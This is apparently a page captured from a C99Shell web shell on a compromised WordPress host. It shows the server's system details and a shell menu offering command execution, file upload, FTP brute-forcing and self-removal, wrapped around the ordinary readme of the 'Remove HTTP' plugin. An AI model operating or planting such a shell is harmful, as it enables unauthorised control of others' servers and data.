!C99Shell v.2.1 [PHP 7 Update] [1.12.2019]!

Software: Apache. PHP/5.6.40-67+ubuntu20.04.1+deb.sury.org+1 

uname -a: Linux hosting1.erectacloud.it 5.4.0-182-generic #202-Ubuntu SMP Fri Apr 26 12:29:36 UTC
2024 x86_64
 

uid=5229(web473) gid=5117(client172) groups=5117(client172),5002(sshusers) 

Safe-mode: OFF (not secure)

/var/www/clients/client172/web473/web/OLD_WP/wp-content/plugins/remove-http/   drwxr-xr-x
Free 181.44 GB of 490.84 GB (36.96%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     readme.txt (4.5 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
=== Remove HTTP: Fix Mixed Content Warning ===
Contributors: factmaven, ethanosullivan
Donate link: https://www.factmaven.com/
Tags: cloudflare, http, https, insecure content, mixed content, mixed content warning, partially encrypted, protocol relative url, protocol rewriting, relative protocol, remove http, remove https, rewrite, ssl, url
Requires at least: 3.0.0
Tested up to: 4.8.1
Requires PHP: 5.2
Stable tag: 2.1.1
License: GPLv3
License URI: http://www.gnu.org/licenses/gpl-3.0.html

Fixes all mixed content warnings. Removes both HTTP and HTTPS protocols from all links from the front-end and back-end.

== Description ==
>**Remove HTTP** is a plugin that automatically scans and removes both `http:` and `https:` protocols from all links. This helps resolve websites that are having "[mixed content warnings](https://wordpress.org/plugins/remove-http/faq/)" which is when the website has assets (images, JavaScript, and CSS) loading both HTTP and HTTPS.

No changes to the links are made in the database. Simply install and activate the plugin and the changes will be immediate. Links that have `http://` or `https://` will only have `//`, making them protocol relative URLs. Below is a before and after example.

= Before =
`
<link rel='stylesheet' href='https://example.com/style.css' type='text/css' />
<script type='text/javascript' src='http://example.com/script.js'></script>
<a href="https://example.com" title="Example">Example</a>
<img src="http://example.com/image.jpg" width="150" height="50" />
`

= After =
`
<link rel='stylesheet' href='//example.com/style.css' type='text/css' />
<script type='text/javascript' src='//example.com/script.js'></script>
<a href="//example.com" title="Example">Example</a>
<img src="//example.com/image.jpg" width="150" height="50" />
`

= Switch to Relative URLs =
There is an option (under the *General* settings) to change internal links to relative URLs.

= Contribute on GitHub =
Want to help improve this plugin? Head over to our [GitHub page](https://github.com/factmaven/remove-http/).

== Installation ==
1. Upload the plugin to the `/wp-content/plugins/` directory.
1. Activate the plugin through the `Plugins` menu in WordPress.
1. Let it settle in for a minute and be amazed.

== Frequently Asked Questions ==
= What is mixed content? =
According to [Google](https://developers.google.com/web/fundamentals/security/prevent-mixed-content/what-is-mixed-content): 
> Mixed content occurs when initial HTML is loaded over a secure HTTPS connection, but other resources (such as images, videos, stylesheets, scripts) are loaded over an insecure HTTP connection. This is called mixed content because both HTTP and HTTPS content are being loaded to display the same page, and the initial request was secure over HTTPS. Modern browsers display warnings about this type of content to indicate to the user that this page contains insecure resources.

In short, mixed content degrades the security and user experience of your HTTPS site.

== Changelog ==
= 2.1.1 =

*2017-09-09*

* Added support for relative domain paths

= 2.1.0 =

*2017-04-09*

* Restored option to ignore external links

= 2.0.0 =

*2017-03-28*

* **Feature**: Switch between protocol-relative or relative URLs
* Ignore `<link>` tags with `rel="canonical"` because [they must be absolute URLs](https://support.google.com/webmasters/answer/139066#2)
* **Fix**: Links in "style" tags weren't affected

= 1.1.1 =

*2017-01-16*

* Minor code improvements

= 1.1.0 =

*2016-10-25*

* **Feature**: Option to remove protocols from internal links only (see *General* > *Protocol Relative URL*)
* Added uninstall to delete custom plugin options
* Improved regex to find all protocols
* Simplified and removed redundant code

= 1.0.2 =

*2016-10-24*

* Function will run once WordPress, all plugins, and the theme are fully loaded
* Reverted back to original regex from v1.0.0
* Upgrade notice shown when update is available
* **Fix**: Conflict with [Visual Composer](https://vc.wpbakery.com) plugin
* **Fix**: YouTube videos in [Revolution Slider](https://revolution.themepunch.com) plugin stopped playing

= 1.0.1 =

*2016-10-10*

* Improved regex to find all protocols
* Comments added for code explanation

= 1.0.0 =

*2016-09-05*

* Initial release, huzzah!

== Upgrade Notice ==
= 1.1.0 =
New plugin option added. Protocol-relative URLs can be applied to internal links only.

= 1.0.2 =
Fixed issue with plugin conflicts such as Visual Composer and Revolution slider.

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v.2.1 [PHP 7 Update] [1.12.2019] maintained by KaizenLouie and updated by cermmik | C99Shell Github (MySQL update) | Generation time: 0.0251 ]--